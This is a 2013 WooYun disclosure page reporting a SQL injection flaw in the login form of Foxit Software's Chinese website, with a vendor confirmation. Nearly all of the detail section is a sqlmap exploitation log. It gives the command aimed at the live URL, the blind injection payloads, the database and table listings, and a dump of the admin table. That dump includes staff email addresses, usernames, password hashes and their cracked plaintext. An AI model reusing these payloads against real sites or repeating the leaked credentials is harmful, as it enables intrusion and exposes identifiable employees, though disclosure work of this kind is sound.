当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042273

漏洞标题:福昕软件主站SQL注入漏洞

相关厂商:福昕软件

漏洞作者: lucky

提交时间:2013-11-07 18:01

修复时间:2013-12-22 18:02

公开时间:2013-12-22 18:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-07: 细节已通知厂商并且等待厂商处理中
2013-11-09: 厂商已经确认,细节仅向厂商公开
2013-11-19: 细节向核心白帽子及相关领域专家公开
2013-11-29: 细节向普通白帽子公开
2013-12-09: 细节向实习白帽子公开
2013-12-22: 细节向公众公开

简要描述:

详细说明:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://www.foxitsoftware.cn/cms/index.php?ac=login"  --data 
"password=e&random=0.3844995207618922&username=lucky" --level=3 --risk=5 --dbs
---
Place: POST
Parameter: username
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: password=e&random=0.3844995207618922&username=-2879') OR (3426=3426)#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: password=e&random=0.3844995207618922&username=lucky') AND 4549=BENCHMARK(5000000,MD5(0x7a567557)) AND ('zfGb'='zfGb
---
available databases [2]:
[*] information_schema
[*] news
Database: news
[43 tables]
+----------------------+
| Copy_of_chr_prize |
| chr_error_log |
| chr_prize |
| chr_user_info |
| counter_ent_user |
| counter_volume |
| download_cate |
| download_packages |
| download_products |
| foxit_admin |
| foxit_login_history |
| foxit_online |
| foxit_operation |
| foxit_position |
| free_support |
| fx_announcement |
| fx_manage |
| fx_platform |
| fx_ticket |
| fx_ticket_back |
| group_buying |
| hd_eslick_user_info |
| internal_user |
| list_send_info |
| mail_content_info |
| product_info |
| refer_info |
| sfc_leads |
| shop_logs |
| shop_orders |
| shop_orders_products |
| shop_pay_channels |
| shop_price |
| shop_products |
| shop_promotion |
| shop_questionnaire |
| shop_shipinfo |
| shop_user |
| user_info |
| user_list_info |
| user_preunsub_info |
| user_refer_info |
| verify_info |
+----------------------+
Database: news
Table: foxit_admin
[15 columns]
+----------------+----------------------+
| Column | Type |
+----------------+----------------------+
| department_id | smallint(4) unsigned |
| email | varchar(60) |
| id | int(11) |
| ip | varchar(16) |
| lastUserID | varchar(25) |
| login_time | datetime |
| LoginFailCount | tinyint(1) unsigned |
| office_id | tinyint(2) unsigned |
| password | varchar(60) |
| permissions | text |
| reg_time | datetime |
| rights_list | varchar(128) |
| status | char(1) |
| user_power | tinyint(2) unsigned |
| username | varbinary(20) |
+----------------+----------------------+
Database: news
Table: foxit_admin
[2 entries]
+----+-----------+------------------+---------------+----+-------------------------------+--------+---------------------+-------------+------------------------------------------+------------+---------------------+-------------+--------------+----------------+
| id | office_id | lastUserID | department_id | ip | email | status | reg_time | username | password | user_power | login_time | rights_list | permissions | LoginFailCount |
+----+-----------+------------------+---------------+----+-------------------------------+--------+---------------------+-------------+------------------------------------------+------------+---------------------+-------------+--------------+----------------+
| 1 | 0 | 1303061138338047 | 0 | <blank> | weibo_guo@foxitsoftware.com | N | 2011-10-18 01:03:38 | Snatch_Wylb | 9f6e6800cfae7749eb6c486619254b9c (sss) | 5 | 2013-03-06 23:38:33 | <blank> | VO,SC,MN | 0 |
| 2 | 0 | 1303070137369563 | 0 | <blank> | julia_jiang@foxitsoftware.com | N | 2011-10-18 01:03:38 | Julia | c2e285cb33cecdbeb83d2189e983a8c0 (julia) | 5 | 2013-03-07 01:37:36 | <blank> | VO,SC,MN\r\n | 0 |
+----+-----------+------------------+---------------+----+-------------------------------+--------+---------------------+-------------+------------------------------------------+------------+---------------------+-------------+--------------+----------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 lucky@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-11-09 00:54

厂商回复:

已提交管理员处理,感谢lucky。

最新状态:

暂无